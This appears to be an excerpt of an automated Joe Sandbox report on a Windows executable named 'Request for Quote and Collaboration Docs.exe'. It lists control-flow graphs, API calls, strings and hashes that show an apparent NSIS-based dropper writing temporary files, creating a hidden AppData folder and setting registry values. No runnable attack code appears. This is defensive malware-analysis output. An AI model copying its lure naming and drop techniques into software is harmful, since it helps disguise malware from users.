                                                                                          control_flow_graph 412 402dbc-402e0a GetTickCount GetModuleFileNameW call 405b56 415 402e16-402e44 call 405eea call 405981 call 405eea GetFileSize 412->415 416 402e0c-402e11 412->416 424 402f34-402f42 call 402d1a 415->424 425 402e4a-402e61 415->425 417 40305b-40305f 416->417 431 403013-403018 424->431 432 402f48-402f4b 424->432 426 402e63 425->426 427 402e65-402e72 call 4032f9 425->427 426->427 436 402e78-402e7e 427->436 437 402fcf-402fd7 call 402d1a 427->437 431->417 434 402f77-402fc3 GlobalAlloc call 406370 call 405b85 CreateFileW 432->434 435 402f4d-402f65 call 40330f call 4032f9 432->435 462 402fc5-402fca 434->462 463 402fd9-403009 call 40330f call 403062 434->463 435->431 460 402f6b-402f71 435->460 440 402e80-402e98 call 405b11 436->440 441 402efe-402f02 436->441 437->431 445 402f0b-402f11 440->445 459 402e9a-402ea1 440->459 444 402f04-402f0a call 402d1a 441->444 441->445 444->445 451 402f13-402f21 call 406302 445->451 452 402f24-402f2e 445->452 451->452 452->424 452->425 459->445 464 402ea3-402eaa 459->464 460->431 460->434 462->417 472 40300e-403011 463->472 464->445 466 402eac-402eb3 464->466 466->445 468 402eb5-402ebc 466->468 468->445 470 402ebe-402ede 468->470 470->431 471 402ee4-402ee8 470->471 473 402ef0-402ef8 471->473 474 402eea-402eee 471->474 472->431 475 40301a-40302b 472->475 473->445 476 402efa-402efc 473->476 474->424 474->473 477 403033-403038 475->477 478 40302d 475->478 476->445 479 403039-40303f 477->479 478->477 479->479 480 403041-403059 call 405b11 479->480 480->417
                                                                                          APIs
                                                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe,00000400), ref: 00402DEC
                                                                                            • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe,80000000,00000003), ref: 00405B5A
                                                                                            • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe,C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe,80000000,00000003), ref: 00402E35
                                                                                          • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                                                          Strings
                                                                                          • C:\Users\user\Desktop, xrefs: 00402E17, 00402E1C, 00402E22
                                                                                          • soft, xrefs: 00402EAC
                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC9, 00402F94
                                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                                                          • "C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe", xrefs: 00402DC5
                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                                                          • C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe, xrefs: 00402DD6, 00402DE5, 00402DF9, 00402E16
                                                                                          • Error launching installer, xrefs: 00402E0C
                                                                                          • Null, xrefs: 00402EB5
                                                                                          • Inst, xrefs: 00402EA3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                          • String ID: "C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                          • API String ID: 2803837635-894512332
                                                                                          • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                          • Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
                                                                                          • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                          • Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 609 401752-401777 call 402b3a call 4059ac 614 401781-401793 call 405eea call 405935 lstrcatW 609->614 615 401779-40177f call 405eea 609->615 620 401798-401799 call 40617e 614->620 615->620 624 40179e-4017a2 620->624 625 4017a4-4017ae call 40622d 624->625 626 4017d5-4017d8 624->626 633 4017c0-4017d2 625->633 634 4017b0-4017be CompareFileTime 625->634 627 4017e0-4017fc call 405b56 626->627 628 4017da-4017db call 405b31 626->628 636 401870-401899 call 405194 call 403062 627->636 637 4017fe-401801 627->637 628->627 633->626 634->633 649 4018a1-4018ad SetFileTime 636->649 650 40189b-40189f 636->650 638 401852-40185c call 405194 637->638 639 401803-401841 call 405eea * 2 call 405f0c call 405eea call 4056c6 637->639 651 401865-40186b 638->651 639->624 671 401847-401848 639->671 653 4018b3-4018be CloseHandle 649->653 650->649 650->653 654 4029d0 651->654 657 4018c4-4018c7 653->657 658 4029c7-4029ca 653->658 659 4029d2-4029d6 654->659 661 4018c9-4018da call 405f0c lstrcatW 657->661 662 4018dc-4018df call 405f0c 657->662 658->654 668 4018e4-402243 call 4056c6 661->668 662->668 668->659 671->651 673 40184a-40184b 671->673 673->638
                                                                                          APIs
                                                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Grope,?,?,00000031), ref: 00401793
                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Grope,?,?,00000031), ref: 004017B8
                                                                                            • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                            • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                            • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp$C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Grope$Call
                                                                                          • API String ID: 1941528284-1474227775
                                                                                          • Opcode ID: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
                                                                                          • Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
                                                                                          • Opcode Fuzzy Hash: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
                                                                                          • Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 675 402573-402588 call 402b1d 678 4029c7-4029ca 675->678 679 40258e-402595 675->679 682 4029d0-4029d6 678->682 680 402597 679->680 681 40259a-40259d 679->681 680->681 683 4025a3-4025b2 call 405e4a 681->683 684 4026e6-4026ee 681->684 683->684 688 4025b8 683->688 684->678 689 4025be-4025c2 688->689 690 402657-402667 call 405bd9 689->690 691 4025c8-4025e3 ReadFile 689->691 690->684 696 402669 690->696 691->684 693 4025e9-4025ee 691->693 693->684 695 4025f4-402602 693->695 697 4026a2-4026ae call 405e31 695->697 698 402608-40261a MultiByteToWideChar 695->698 699 40266c-40266f 696->699 697->682 698->696 701 40261c-40261f 698->701 699->697 702 402671-402676 699->702 704 402621-40262c 701->704 706 4026b3-4026b7 702->706 707 402678-40267d 702->707 704->699 705 40262e-402653 SetFilePointer MultiByteToWideChar 704->705 705->704 710 402655 705->710 708 4026d4-4026e0 SetFilePointer 706->708 709 4026b9-4026bd 706->709 707->706 711 40267f-402692 707->711 708->684 712 4026c5-4026d2 709->712 713 4026bf-4026c3 709->713 710->696 711->684 714 402694-40269a 711->714 712->684 713->708 713->712 714->689 715 4026a0 714->715 715->684
                                                                                          APIs
                                                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                            • Part of subcall function 00405BD9: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                            • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                          • String ID: 9
                                                                                          • API String ID: 1149667376-2366072709
                                                                                          • Opcode ID: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                          • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
                                                                                          • Opcode Fuzzy Hash: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                          • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 716 40317d-4031a6 GetTickCount 717 4032e7-4032ef call 402d1a 716->717 718 4031ac-4031d7 call 40330f SetFilePointer 716->718 723 4032f1-4032f6 717->723 724 4031dc-4031ee 718->724 725 4031f0 724->725 726 4031f2-403200 call 4032f9 724->726 725->726 729 403206-403212 726->729 730 4032d9-4032dc 726->730 731 403218-40321e 729->731 730->723 732 403220-403226 731->732 733 403249-403265 call 406390 731->733 732->733 734 403228-403248 call 402d1a 732->734 739 4032e2 733->739 740 403267-40326f 733->740 734->733 741 4032e4-4032e5 739->741 742 403271-403287 WriteFile 740->742 743 4032a3-4032a9 740->743 741->723 745 403289-40328d 742->745 746 4032de-4032e0 742->746 743->739 744 4032ab-4032ad 743->744 744->739 747 4032af-4032c2 744->747 745->746 748 40328f-40329b 745->748 746->741 747->724 750 4032c8-4032d7 SetFilePointer 747->750 748->731 749 4032a1 748->749 749->747 750->717
                                                                                          APIs
                                                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                                                            • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                          • WriteFile.KERNELBASE(0040BE78,0040E440,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                          • SetFilePointer.KERNELBASE(000066D4,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Pointer$CountTickWrite
                                                                                          • String ID: @@$x>A
                                                                                          • API String ID: 2146148272-2136812597
                                                                                          • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                          • Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
                                                                                          • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                          • Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 751 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW 758 4029c7-4029d6 751->758 759 40237d-402385 751->759 761 402387-402394 call 402b3a lstrlenW 759->761 762 402398-40239b 759->762 761->762 763 4023ab-4023ae 762->763 764 40239d-4023aa call 402b1d 762->764 768 4023b0-4023ba call 403062 763->768 769 4023bf-4023d3 RegSetValueExW 763->769 764->763 768->769 773 4023d5 769->773 774 4023d8-4024b2 RegCloseKey 769->774 773->774 774->758 776 402793-40279a 774->776 776->758
                                                                                          APIs
                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp
                                                                                          • API String ID: 1356686001-121066399
                                                                                          • Opcode ID: 57df5d2fd497d946e5d44718c2ce9500a544491e1817e3951972c4e7e3852fff
                                                                                          • Instruction ID: 3600ae87f41ed0761c30afac485ceb57641edc98565fd21ac0e2bbddf966c716
                                                                                          • Opcode Fuzzy Hash: 57df5d2fd497d946e5d44718c2ce9500a544491e1817e3951972c4e7e3852fff
                                                                                          • Instruction Fuzzy Hash: 511160B1A00108BEEB10AFA4DD49EAFBB7CEB50358F10443AF905B61D1D7B85D419B69

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 777 4015b9-4015cd call 402b3a call 4059e0 782 401614-401617 777->782 783 4015cf-4015eb call 405962 CreateDirectoryW 777->783 784 401646-402197 call 401423 782->784 785 401619-401638 call 401423 call 405eea SetCurrentDirectoryW 782->785 791 40160a-401612 783->791 792 4015ed-4015f8 GetLastError 783->792 798 4029c7-4029d6 784->798 785->798 800 40163e-401641 785->800 791->782 791->783 795 401607 792->795 796 4015fa-401605 GetFileAttributesW 792->796 795->791 796->791 796->795 800->798
                                                                                          APIs
                                                                                            • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,?,?,76F92EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe"), ref: 004059EE
                                                                                            • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
                                                                                            • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
                                                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Grope,?,00000000,000000F0), ref: 00401630
                                                                                          Strings
                                                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Grope, xrefs: 00401623
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Grope
                                                                                          • API String ID: 3751793516-1590673197
                                                                                          • Opcode ID: 9bef887c5d5f536874f37580d62bfdc690f86322df1a9697a894e0e2e9f3eda4
                                                                                          • Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
                                                                                          • Opcode Fuzzy Hash: 9bef887c5d5f536874f37580d62bfdc690f86322df1a9697a894e0e2e9f3eda4
                                                                                          • Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 803 10001771-100017ad call 10001b3e 807 100017b3-100017b7 803->807 808 100018be-100018c0 803->808 809 100017c0-100017cd call 100022eb 807->809 810 100017b9-100017bf call 100022a1 807->810 815 100017fd-10001804 809->815 816 100017cf-100017d4 809->816 810->809 817 10001824-10001828 815->817 818 10001806-10001822 call 1000248d call 100015cc call 10001280 GlobalFree 815->818 819 100017d6-100017d7 816->819 820 100017ef-100017f2 816->820 821 10001866-1000186c call 1000248d 817->821 822 1000182a-10001864 call 100015cc call 1000248d 817->822 843 1000186d-10001871 818->843 825 100017d9-100017da 819->825 826 100017df-100017e0 call 10002868 819->826 820->815 823 100017f4-100017f5 call 10002b23 820->823 821->843 822->843 836 100017fa 823->836 831 100017e7-100017ed call 1000260b 825->831 832 100017dc-100017dd 825->832 839 100017e5 826->839 842 100017fc 831->842 832->815 832->826 836->842 839->836 842->815 846 10001873-10001881 call 10002450 843->846 847 100018ae-100018b5 843->847 853 10001883-10001886 846->853 854 10001899-100018a0 846->854 847->808 849 100018b7-100018b8 GlobalFree 847->849 849->808 853->854 856 10001888-10001890 853->856 854->847 855 100018a2-100018ad call 10001555 854->855 855->847 856->854 858 10001892-10001893 FreeLibrary 856->858 858->854
                                                                                          APIs
                                                                                            • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
                                                                                            • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
                                                                                            • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 1000181C
                                                                                          • FreeLibrary.KERNEL32(?), ref: 10001893
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100018B8
                                                                                            • Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,405EA210), ref: 100022D3
                                                                                            • Part of subcall function 1000260B: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 1000267D
                                                                                            • Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
                                                                                            • Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
                                                                                            • Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002559
                                                                                            • Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2258160193.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2258134522.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258242112.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258276811.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_10000000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                          • String ID:
                                                                                          • API String ID: 1767494692-3916222277
                                                                                          • Opcode ID: ee44118ed5f66a04bcbaddb203534a3c862fc054acfad86daf15ba6692a0e061
                                                                                          • Instruction ID: b3d4579510dcbc356f87b8c5eb81e8e4ebd4f83f88234b59d07570181d0aa013
